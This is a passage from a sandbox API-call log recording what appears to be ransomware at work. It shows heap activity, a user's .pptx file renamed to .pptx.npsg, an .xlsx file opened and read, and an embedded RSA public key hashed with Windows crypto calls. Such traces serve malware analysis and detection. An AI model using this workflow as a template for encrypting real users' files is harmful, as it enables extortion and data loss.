Flags=0x0, Size=0x10) returned 0x34002f0 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34002d8 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.728] GetCurrentThreadId () returned 0x5b4 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b792b8 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.728] GetCurrentThreadId () returned 0x5b4 [0236.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002f0 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002c0 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400350 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400368 [0236.731] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14f8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.731] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.731] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.731] CloseHandle (hObject=0x644) returned 1 [0236.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.733] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k5oSr-PB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k5osr-pb.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k5oSr-PB.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k5osr-pb.pptx.npsg")) returned 1 [0236.734] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b777f00, ftCreationTime.dwHighDateTime=0x1d58815, ftLastAccessTime.dwLowDateTime=0x838d2490, ftLastAccessTime.dwHighDateTime=0x1d54762, ftLastWriteTime.dwLowDateTime=0x838d2490, ftLastWriteTime.dwHighDateTime=0x1d54762, nFileSizeHigh=0x0, nFileSizeLow=0xbadd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lF1b2YUr4l3y9B7QFUi.xlsx", cAlternateFileName="LF1B2Y~1.XLS")) returned 1 [0236.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0236.734] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lF1b2YUr4l3y9B7QFUi.xlsx") returned=".xlsx" [0236.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lF1b2YUr4l3y9B7QFUi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lf1b2yur4l3y9b7qfui.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.735] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=47837) returned 1 [0236.736] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.738] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xbab7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.738] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.740] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xbadd, lpOverlapped=0x0) returned 1 [0236.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.741] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.742] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.742] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.742] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.742] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.742] GetLastError () returned 0x0 [0236.742] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.742] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.742] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.742] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.742] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.742] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400350 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400308 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34002f0 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.743] GetCurrentThreadId () returned 0x5b4 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79348 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.744] GetCurrentThreadId () returned 0x5b4 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400350 [0236.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400308 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400368 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400380 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400320 [0236.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002f0 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 